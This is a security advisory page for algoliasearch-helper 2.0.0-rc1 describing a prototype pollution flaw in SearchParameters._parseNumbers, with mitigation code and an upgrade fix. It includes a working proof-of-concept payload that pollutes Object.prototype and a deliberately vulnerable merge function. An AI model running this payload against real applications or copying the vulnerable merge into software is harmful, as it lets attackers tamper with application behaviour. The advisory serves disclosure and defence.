algoliasearch-helper@2.0.0-rc1 vulnerabilities

Helper for implementing advanced search features with algolia

Direct Vulnerabilities

Known vulnerabilities in the algoliasearch-helper package. This does not include vulnerabilities belonging to this package’s dependencies.

Vulnerability (severity M): Prototype Pollution

Prototype Pollution

algoliasearch-helper is a helper for implementing advanced search features with Algolia.

Affected versions of this package are vulnerable to Prototype Pollution because SearchParameters._parseNumbers in src/SearchParameters/index.js uses a merge function that copies every key of its input, with no guard against prototype properties such as __proto__, so a crafted parameters object can write properties onto Object.prototype.

Note that this vulnerability is only exploitable if the application lets users define arbitrary search parameters.

PoC

// Run `npm i algoliasearch-helper`, then run this script with node
const algohelp = require('algoliasearch-helper');

// JSON.parse creates an own "__proto__" key; an object literal would set the prototype instead
const payload = JSON.parse('{"__proto__": {"polluted": "vulnerable to PP"}}');
const test = {};
console.log("Before: " + test.polluted); // Before: undefined
algohelp.SearchParameters._parseNumbers(payload); // returns {}
console.log("After: " + test.polluted); // After: vulnerable to PP (inherited from the polluted Object.prototype)
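To show the defect class and its defense side by side, here is an added example that is not algoliasearch-helper's own code: a naive recursive merge that the same kind of payload pollutes, a hardened merge that skips prototype keys, and an input check an application can run before handing user-supplied parameters to any library. The names naiveMerge, safeMerge, hasPrototypeKeys and demo are assumed for this demo and the payload is constructed.

```javascript
// Added example, not algoliasearch-helper's own code: naiveMerge reproduces the
// defect class; safeMerge and hasPrototypeKeys are the defensive counterparts.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const isPlainObject = (v) => v !== null && typeof v === 'object' && !Array.isArray(v);
// Vulnerable: for..in visits the own key "__proto__" that JSON.parse creates;
// target["__proto__"] is Object.prototype, so the recursion writes into it.
function naiveMerge(target, source) {
  for (const key in source) {
    const value = source[key];
    if (isPlainObject(value)) {
      if (!isPlainObject(target[key])) target[key] = {};
      naiveMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}
// Hardened: own keys only, prototype keys skipped, nested targets reused only
// when they are the target's own properties.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || !isPlainObject(target[key])) target[key] = {};
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}
// Input gate for callers that must hand user-controlled parameters to a merge
// they do not control: true if any nested key is a prototype key.
function hasPrototypeKeys(value) {
  return isPlainObject(value) &&
    Object.keys(value).some((k) => FORBIDDEN_KEYS.has(k) || hasPrototypeKeys(value[k]));
}
// Runs both merges on a constructed payload and reports what a fresh object sees
// afterwards; Object.prototype is cleaned so the pollution does not persist.
function demo() {
  const payload = JSON.parse('{"__proto__": {"polluted": "yes"}, "hitsPerPage": "20"}');
  naiveMerge({}, payload);
  const afterNaive = ({}).polluted;
  delete Object.prototype.polluted;
  const merged = safeMerge({}, payload);
  return { afterNaive, afterSafe: ({}).polluted, kept: merged.hitsPerPage, flagged: hasPrototypeKeys(payload) };
}
```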

How to fix Prototype Pollution?

Upgrade algoliasearch-helper to version 3.6.2 or higher.

Vulnerable versions: <3.6.2